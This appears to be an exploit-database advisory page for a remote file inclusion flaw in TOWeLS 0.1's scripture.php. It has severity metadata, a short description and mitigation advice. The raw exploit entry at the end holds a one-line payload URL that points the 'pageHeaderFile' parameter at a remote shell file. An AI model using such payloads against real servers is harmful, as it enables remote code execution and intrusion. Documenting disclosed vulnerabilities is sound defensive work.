header-logo
Suggest Exploit
vendor:
TOWeLS
by:
milw0rm.com
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: TOWeLS
Affected Version From: TOWeLS version 0.1
Affected Version To: TOWeLS version 0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

TOWeLS version 0.1 (scripture.php) Remote File Inclusion Vulnerability

The vulnerability allows an attacker to include a remote file on the vulnerable server. In this case, the vulnerability exists in the scripture.php file of TOWeLS version 0.1. By manipulating the 'pageHeaderFile' parameter, an attacker can include a malicious file hosted on a remote server.

Mitigation:

The vulnerability can be mitigated by properly validating and sanitizing user input before including files. It is recommended to update to a patched version of the software if available.
Source

Exploit-DB raw data:

TOWeLS version 0.1 (scripture.php) Remote File Inclusion Vulnerability
http://sourceforge.net/project/showfiles.php?group_id=126659 / towels-0.1.zip /
/towels-0.1/src/scripture.php?pageHeaderFile=http://localhost/shell.txt?

# milw0rm.com [2007-10-22]